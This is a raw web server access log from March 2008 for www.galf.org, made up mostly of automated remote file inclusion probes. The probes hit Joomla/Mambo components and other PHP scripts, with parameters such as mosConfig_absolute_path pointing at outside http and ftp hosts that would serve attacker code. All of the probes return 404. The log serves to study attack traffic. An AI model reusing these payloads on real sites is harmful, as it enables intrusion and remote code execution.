84.18.207.65 - - [23/Mar/2008:17:00:18 -0700] "GET /logs/access_080225.log/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [23/Mar/2008:17:00:18 -0700] "GET /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [23/Mar/2008:17:00:18 -0700] "GET /logs/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:00:44 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:00:54 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:00:58 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
137.132.3.7 - - [23/Mar/2008:17:01:22 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
137.132.3.7 - - [23/Mar/2008:17:01:22 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:17:01:34 -0700] "GET /logs/access_071112.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:17:01:34 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:17:02:11 -0700] "GET /logs/access_071112.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:17:02:12 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:17:03:36 -0700] "GET /logs/access_071008.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:17:03:55 -0700] "GET /logs/access_071008.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.79.181.37 - - [23/Mar/2008:17:04:14 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.79.181.37 - - [23/Mar/2008:17:04:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:17:04:23 -0700] "GET /logs/access_071008.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.169.224.66 - - [23/Mar/2008:17:04:32 -0700] "GET /logs/index.php3?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.169.224.66 - - [23/Mar/2008:17:04:37 -0700] "GET /index.php3?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.193.231.206 - - [23/Mar/2008:17:06:04 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.193.231.206 - - [23/Mar/2008:17:06:05 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:17:08:29 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 786432 "-" "-" "www.galf.org"
67.195.44.110 - - [23/Mar/2008:17:09:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.108 - - [23/Mar/2008:17:09:34 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:17:11:20 -0700] "GET /logs/access_071022.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:17:11:20 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:17:11:21 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.55.208.231 - - [23/Mar/2008:17:11:26 -0700] "GET /cendoc/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:12:48 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:12:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:12:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:13:01 -0700] "GET /logs/access.log/index.php4?lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:13:01 -0700] "GET /index.php4?lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:17:13:41 -0700] "GET /logs/index.php4?lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:17:13:41 -0700] "GET /index.php4?lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:14:52 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.225.214.179 - - [23/Mar/2008:17:15:41 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.214.179 - - [23/Mar/2008:17:15:41 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.214.179 - - [23/Mar/2008:17:15:41 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.214.179 - - [23/Mar/2008:17:15:51 -0700] "GET /logs/access_080113.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:15:59 -0700] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:16:04 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:16:08 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.216.60 - - [23/Mar/2008:17:16:10 -0700] "GET /logs/access.log HTTP/1.0" 200 9542 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.49 - - [23/Mar/2008:17:16:27 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:17:17:00 -0700] "GET /index.php4?lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.169.224.66 - - [23/Mar/2008:17:19:01 -0700] "GET /logs/index.php4?lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.62.9.58 - - [23/Mar/2008:17:19:24 -0700] "GET / HTTP/1.0" 200 1032 "http://galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "galf.org"
85.25.137.24 - - [23/Mar/2008:17:21:50 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:17:21:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:17:21:50 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:17:22:08 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.29.32.2 - - [23/Mar/2008:17:23:41 -0700] "GET /logs/access_071008.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [23/Mar/2008:17:23:42 -0700] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.102.153 - - [23/Mar/2008:17:24:22 -0700] "GET /logs/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
87.118.102.153 - - [23/Mar/2008:17:24:22 -0700] "GET /index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
85.25.144.250 - - [23/Mar/2008:17:24:29 -0700] "GET /logs/access_070917.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.144.250 - - [23/Mar/2008:17:24:29 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.144.250 - - [23/Mar/2008:17:24:29 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.29.32.2 - - [23/Mar/2008:17:24:32 -0700] "GET /logs/access_071119.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.52.195.135 - - [23/Mar/2008:17:24:41 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
72.52.195.135 - - [23/Mar/2008:17:24:41 -0700] "GET /logs/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
74.95.82.113 - - [23/Mar/2008:17:25:31 -0700] "GET /logs/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
74.95.82.113 - - [23/Mar/2008:17:25:32 -0700] "GET /index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:17:25:48 -0700] "GET /logs/access_070917.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:26:55 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:26:56 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:26:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:27:21 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:27:22 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:27:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:26 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:26 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:26 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.221.157.210 - - [23/Mar/2008:17:28:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:17:28:44 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 1245184 "-" "-" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:02 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:02 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:02 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:03 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:03 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:03 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:29:06 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:29:07 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:29:07 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.86.112.34 - - [23/Mar/2008:17:29:11 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.94.66 - - [23/Mar/2008:17:29:11 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.112.34 - - [23/Mar/2008:17:29:11 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.94.66 - - [23/Mar/2008:17:29:11 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.67.202.72 - - [23/Mar/2008:17:29:27 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.woodland.net/cal/backgrounds/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:50 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:29:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.216.92 - - [23/Mar/2008:17:29:53 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:30:00 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:30:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:30:00 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:30:32 -0700] "GET /logs/access_071231.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:30:32 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:30:32 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:31:41 -0700] "GET /logs/access_080114.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.126.94.66 - - [23/Mar/2008:17:31:43 -0700] "GET /logs/access_071231.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.94.66 - - [23/Mar/2008:17:31:43 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.94.66 - - [23/Mar/2008:17:31:43 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.240.146 - - [23/Mar/2008:17:31:43 -0700] "GET /logs/access_080114.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:31:53 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:31:53 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:31:53 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:32:04 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:32:04 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.150 - - [23/Mar/2008:17:32:05 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
